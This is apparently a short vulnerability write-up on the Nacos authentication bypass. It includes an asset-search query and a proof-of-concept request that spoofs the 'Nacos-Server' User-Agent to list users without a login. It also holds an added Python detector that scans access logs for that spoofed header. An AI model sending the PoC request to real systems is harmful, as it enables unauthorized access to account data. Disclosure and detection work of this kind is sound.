Alibaba Nacos User Unauthorized Access Vulnerability
Vulnerability Description
On December 29, 2020, Nacos officially disclosed, in an issue published on GitHub, that Alibaba Nacos has an unauthorized access vulnerability caused by improper handling of the User-Agent header.
Vulnerability Impact
Alibaba Nacos
Network asset mapping
app="NACOS"
Vulnerability Reproduction
Login page
Verification PoC
GET /nacos/v1/auth/users?pageNo=1&pageSize=9
User-Agent: Nacos-Server
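A detection check for the request above, added here as an example and not part of the original post: it scans reverse-proxy access logs for requests that present the Nacos-Server User-Agent from an address that is not a known cluster member. The Combined Log Format, the peer subnet and the sample log lines are assumptions constructed for illustration.

```python
import ipaddress
import re

# Combined Log Format, as written by a reverse proxy in front of Nacos (assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Hypothetical subnet holding the legitimate Nacos cluster members.
CLUSTER_PEERS = [ipaddress.ip_network("10.0.5.0/29")]

# Constructed sample log lines (private and documentation address ranges).
SAMPLE_LOG = """\
10.0.5.2 - - [29/Dec/2020:10:00:01 +0000] "GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1" 200 231 "-" "Nacos-Server"
203.0.113.7 - - [29/Dec/2020:10:00:05 +0000] "GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1" 200 231 "-" "Nacos-Server"
198.51.100.4 - - [29/Dec/2020:10:00:09 +0000] "GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1" 403 98 "-" "Mozilla/5.0"
198.51.100.4 - - [29/Dec/2020:10:00:12 +0000] "GET /nacos/ HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""


def is_cluster_peer(ip_text):
    """True if the source address belongs to a known cluster member."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False  # an unparsable source is never trusted
    return any(ip in net for net in CLUSTER_PEERS)


def find_spoofed_server_ua(log_text):
    """Return (ip, path, status) for Nacos-Server User-Agent requests from non-peers."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ua = m.group("ua").lower()      # prefix match, case-insensitive, to be conservative
        path = m.group("path").lower()
        if (ua.startswith("nacos-server") and path.startswith("/nacos/v1/")
                and not is_cluster_peer(m.group("ip"))):
            hits.append((m.group("ip"), m.group("path"), int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for ip, path, status in find_spoofed_server_ua(SAMPLE_LOG):
        print(f"ALERT {ip} -> {path} (HTTP {status})")
```

A hit with status 200 on the users endpoint means the request was served without a login and should be treated as confirmed exposure.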
This post is licensed under CC BY 4.0 by the author.